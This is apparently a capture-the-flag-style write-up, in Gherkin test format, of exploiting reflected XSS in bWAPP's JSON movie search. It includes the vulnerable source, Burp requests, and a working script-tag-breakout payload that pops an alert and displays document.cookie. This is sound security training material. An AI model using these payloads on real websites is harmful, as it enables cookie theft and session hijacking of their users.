# language: en

Feature: XSS Reflected - (JSON)
  From system bWAPP
  From the A3 - Cross Site Scripting
  With Low security level

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am running Burp Suite Community edition v1.7.30
  Given the following in the url
  """
  URL: http://localhost/bWAPP/xss_json.php
  Message: XSS Reflected - (JSON)
  Details:
          - Form asking to input the name of a movie
          - HINT: our master really loves Marvel movies :)
          - Submit button
  Objective: Inject javascript code into the site
  """

Scenario: XSS Reflected - (JSON)
  Given the vulnerable form
  """
  # xss_json.php
  57  <p>
  58  <label for="title">Search for a movie:</label>
  59  <input type="text" id="title" name="title">
  60  <button type="submit" name="action" value="search">Search</button>
  61  </p>
  """
  And a script using JSON on the response
  """
  # xss_json.php
  68  <div id="result"></div>
  69  <script>
  70    var JSONResponseString = '{"movies":[{"response":"HINT: our master \
        really loves Marvel movies :)"}]}';
  71    // var JSONResponse = eval ("(" + JSONResponseString + ")");
  72    var JSONResponse = JSON.parse(JSONResponseString);
  73    document.getElementById("result").innerHTML=JSONResponse.movies[0].\
        response;
  74  </script>
  """
  When I input a value following the hint
  And I use Burp to follow the request/response
  """
  # Burp Request on xss_json.php
  GET /bWAPP/xss_json.php?title=iron+man&action=search HTTP/1.1
  Host: 192.168.56.101
  ...
  ...
  Referer: http://192.168.56.101/bWAPP/xss_json.php?title=iron+man&action=search
  Cookie: security_level=0; PHPSESSID=18eb8016726de666e595ac21c7014ccc

  # Response on xss_json.php
  var JSONResponseString = '{"movies":[{"response":"Yes! \
    We have that movie..."}]}';
  // var JSONResponse = eval ("(" + JSONResponseString + ")");
  var JSONResponse = JSON.parse(JSONResponseString);
  document.getElementById("result").innerHTML=JSONResponse.movies[0].response;
  """
  And I see a confirmation
  Then I try to inject some javascript using Burp
  """
  # Burp request
  GET /bWAPP/xss_json.php?title=%3Cscript%3Ealert%28%22asd%22%29%3C%2Fscript%\
  3E&action=search HTTP/1.1
  Host: 192.168.56.101
  ...
  ...
  Referer: http://192.168.56.101/bWAPP/xss_json.php?title=%3Cscript%3Ealert%28\
  1%29%3C%2Fscript%3E&action=search
  Cookie: security_level=0; PHPSESSID=64b72ce878a5a7bf58d8321444c0d532
  Connection: close
  Upgrade-Insecure-Requests: 1

  # The injected string readable:
  <script>alert(1)</script>
  """
  Then I check at the response to see it didn't work
  """
  # Response
  var JSONResponseString = '{"movies":[{"response":"<script>alert(1)</script>\
  ??? Sorry, we don&#039;t have that movie :("}]}';
  """
  But I search on google for possible ways to bypass it
  And I see I can use a semicolon and ending script tag
  """
  # Burp Request
  GET /bWAPP/xss_json.php?title=%3B%3C%2Fscript%3E%3Cscript%3Ealert%281\
  %29%3C%2Fscript%3E&action=search HTTP/1.1
  Host: 192.168.56.101
  ...
  ...
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0)
  Referer: http://192.168.56.101/bWAPP/xss_json.php?title=%3B%3C%2Fscript\
  %3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&action=search
  Cookie: security_level=0; PHPSESSID=18eb8016726de666e595ac21c7014ccc
  ...
  ...

  # The injected string:
  ;</script><script>alert(1)</script>

  # Response
  var JSONResponseString = '{"movies":[{"response":";</script><script>alert(1)\
  </script>??? Sorry, we don&#039;t have that movie :("}]}';
  """
  When I see in the browser, the pop up appears
  And I see it prints the error
  Then I think this is a good way to bypass the JSON filter
  And I craft another string to inject and use Burp
  """
  # Burp Request
  GET /bWAPP/xss_json.php?title=%3B%3C%2Fscript%3E%3Cscript%3Ealert%28\
  document.cookie%29%3C%2Fscript%3E&action=search HTTP/1.1
  Host: 192.168.56.101
  ...
  ...
  Referer: http://192.168.56.101/bWAPP/xss_json.php?title=%3B%3C%2Fscript%3E%3C\
  script%3Ealert%281%29%3C%2Fscript%3E&action=search
  Cookie: security_level=0; PHPSESSID=18eb8016726de666e595ac21c7014ccc

  # Injected string:
  ;</script><script>alert(document.cookie)</script>

  # Response
  security_level=0; PHPSESSID=18eb8016726de666e595ac21c7014ccc
  ??? Sorry, we don't have that movie :("}]}'; // var JSONResponse = eval \
  ("(" + JSONResponseString + ")"); var JSONResponse = JSON.parse\
  (JSONResponseString); document.getElementById("result").\
  innerHTML=JSONResponse.movies[0].response;
  """
  And I see the cookie got printed in plain html as response
